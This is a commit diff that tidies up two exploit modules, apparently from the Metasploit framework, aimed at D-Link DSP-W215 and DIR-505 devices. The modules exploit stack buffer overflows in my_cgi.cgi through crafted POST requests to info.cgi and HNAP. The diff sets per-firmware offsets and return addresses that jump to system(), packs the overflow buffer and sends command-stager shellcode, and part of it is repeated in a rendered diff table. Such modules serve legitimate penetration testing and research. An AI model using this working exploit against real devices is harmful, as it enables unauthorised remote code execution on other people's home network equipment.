Code cleanup

jvazquez-r7 · jvazquez-r7 · commit a356a0e81816 · 2014-07-11T12:00:31.000-05:00
diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb
@@ -15,8 +15,11 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'D-Link info.cgi Buffer Overflow in POST Request',
       'Description'    => %q{
-          This module exploits an anonymous remote code execution vulnerability on different D-Link devices.
-        This module has been successfully tested on D-Link DSP-W215 in an emulated environment.
+        This module exploits an anonymous remote code execution vulnerability on different D-Link
+        devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
+        when handling specially crafted POST HTTP requests addresses to the /common/info.cgi
+        handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
+        environment.
       },
       'Author'         =>
         [
@@ -40,12 +43,14 @@ def initialize(info = {})
           [ 'D-Link DSP-W215 - v1.02',
             {
               'Offset' => 477472,
-              'Ret'    => "\x00\x40\x5C\xEC" # jump to system - my_cgi.cgi
+              'Ret'    => 0x405cec # jump to system - my_cgi.cgi
             }
           ]
         ],
       'DisclosureDate' => 'May 22 2014',
       'DefaultTarget' => 0))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -56,38 +61,16 @@ def check
       })
 
       if res && [200, 301, 302].include?(res.code)
-
-        # trying to automatically detect a vulnerable device
-        # I think there are other vulnerable devices out there
-        # Todo: Check more devices and create some more targets
-        if (target['auto'])
-          if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
-
-            self.targets.each do |t|
-              if (t.name =~ /DSP-W215.*1.02/) then
-                @my_target = t
-                break
-              end
-            end
-
-          else
-            # no supported device found
-            return Exploit::CheckCode::Unknown
-          end
-
-          print_status("#{peer} - Selected Target: #{@mytarget.name}")
-          print_good("#{peer} - detected a vulnerable device")
-          return Exploit::CheckCode::Detected
-
-        # no auto-targetting ... the user is responsible
-        else
-          print_good("#{peer} - detected a device with unknown exploitability ... trying to exploit")
-          return Exploit::CheckCode::Detected
+        if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
+          @my_target = targets[1] if target['auto']
+          return Exploit::CheckCode::Appears
         end
+
+        return Exploit::CheckCode::Detected
       end
 
     rescue ::Rex::ConnectionError
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Safe
     end
 
     Exploit::CheckCode::Unknown
@@ -96,14 +79,18 @@ def check
   def exploit
     print_status("#{peer} - Trying to access the vulnerable URL...")
 
-    # Use a copy of the target
     @my_target = target
+    check_code = check
 
-    unless check == Exploit::CheckCode::Detected
-      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
     end
 
-    print_status("#{peer} - Exploiting...")
+    if @my_target.nil? || @my_target['auto']
+      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
+    end
+
+    print_status("#{peer} - Exploiting #{@my_target.name}...")
     execute_cmdstager(
       :flavor  => :echo,
       :linemax => 185
@@ -112,7 +99,7 @@ def exploit
 
   def prepare_shellcode(cmd)
     buf = rand_text_alpha_upper(@my_target['Offset'])   # Stack filler
-    buf << @my_target.ret                               # Overwrite $ra -> jump to system
+    buf << [@my_target.ret].pack("N")                   # Overwrite $ra -> jump to system
 
            # la $t9, system
            # la $s1, 0x440000
@@ -135,7 +122,7 @@ def execute_command(cmd, opts)
         'vars_post'     => {
           'storage_path' => shellcode,
         }
-      })
+      }, 5)
       return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb
@@ -44,19 +44,19 @@ def initialize(info = {})
           [ 'D-Link DSP-W215 - v1.0',
             {
               'Offset'  => 1000000,
-              'Ret'     => "\x00\x40\x5C\xAC",    # jump to system - my_cgi.cgi
+              'Ret'     => 0x405cac, # jump to system - my_cgi.cgi
             }
           ],
           [ 'D-Link DIR-505 - v1.06',
             {
               'Offset'  => 30000,
-              'Ret'     => "\x00\x40\x52\x34",    # jump to system - my_cgi.cgi
+              'Ret'     => 0x405234, # jump to system - my_cgi.cgi
             }
           ],
           [ 'D-Link DIR-505 - v1.07',
             {
               'Offset'  => 30000,
-              'Ret'     => "\x00\x40\x5C\x5C",    # jump to system - my_cgi.cgi
+              'Ret'     => 0x405c5c, # jump to system - my_cgi.cgi
             }
           ]
         ],
@@ -116,13 +116,13 @@ def exploit
   end
 
   def prepare_shellcode(cmd)
-    buf = rand_text_alpha_upper(@my_target['Offset'])   # Stack filler
+    buf = rand_text_alpha_upper(@my_target['Offset'])  # Stack filler
     buf << rand_text_alpha_upper(4)                    # $s0, don't care
     buf << rand_text_alpha_upper(4)                    # $s1, don't care
     buf << rand_text_alpha_upper(4)                    # $s2, don't care
     buf << rand_text_alpha_upper(4)                    # $s3, don't care
     buf << rand_text_alpha_upper(4)                    # $s4, don't care
-    buf << @my_target['Ret']                            # $ra
+    buf << [@my_target.ret].pack("N")                  # $ra
 
            # la $t9, system
            # la $s1, 0x440000

Original file line number	Diff line number	Diff line change
`@@ -44,19 +44,19 @@ def initialize(info = {})`
`44`	`44`	`[ 'D-Link DSP-W215 - v1.0',`
`45`	`45`	`{`
`46`	`46`	`'Offset' => 1000000,`
`47`		`- 'Ret' => "\x00\x40\x5C\xAC", # jump to system - my_cgi.cgi`
	`47`	`+ 'Ret' => 0x405cac, # jump to system - my_cgi.cgi`
`48`	`48`	`}`
`49`	`49`	`],`
`50`	`50`	`[ 'D-Link DIR-505 - v1.06',`
`51`	`51`	`{`
`52`	`52`	`'Offset' => 30000,`
`53`		`- 'Ret' => "\x00\x40\x52\x34", # jump to system - my_cgi.cgi`
	`53`	`+ 'Ret' => 0x405234, # jump to system - my_cgi.cgi`
`54`	`54`	`}`
`55`	`55`	`],`
`56`	`56`	`[ 'D-Link DIR-505 - v1.07',`
`57`	`57`	`{`
`58`	`58`	`'Offset' => 30000,`
`59`		`- 'Ret' => "\x00\x40\x5C\x5C", # jump to system - my_cgi.cgi`
	`59`	`+ 'Ret' => 0x405c5c, # jump to system - my_cgi.cgi`
`60`	`60`	`}`
`61`	`61`	`]`
`62`	`62`	`],`
`@@ -116,13 +116,13 @@ def exploit`
`116`	`116`	`end`
`117`	`117`
`118`	`118`	`def prepare_shellcode(cmd)`
`119`		`- buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler`
	`119`	`+ buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler`
`120`	`120`	`buf << rand_text_alpha_upper(4) # $s0, don't care`
`121`	`121`	`buf << rand_text_alpha_upper(4) # $s1, don't care`
`122`	`122`	`buf << rand_text_alpha_upper(4) # $s2, don't care`
`123`	`123`	`buf << rand_text_alpha_upper(4) # $s3, don't care`
`124`	`124`	`buf << rand_text_alpha_upper(4) # $s4, don't care`
`125`		`- buf << @my_target['Ret'] # $ra`
	`125`	`+ buf << [@my_target.ret].pack("N") # $ra`
`126`	`126`
`127`	`127`	`# la $t9, system`
`128`	`128`	`# la $s1, 0x440000`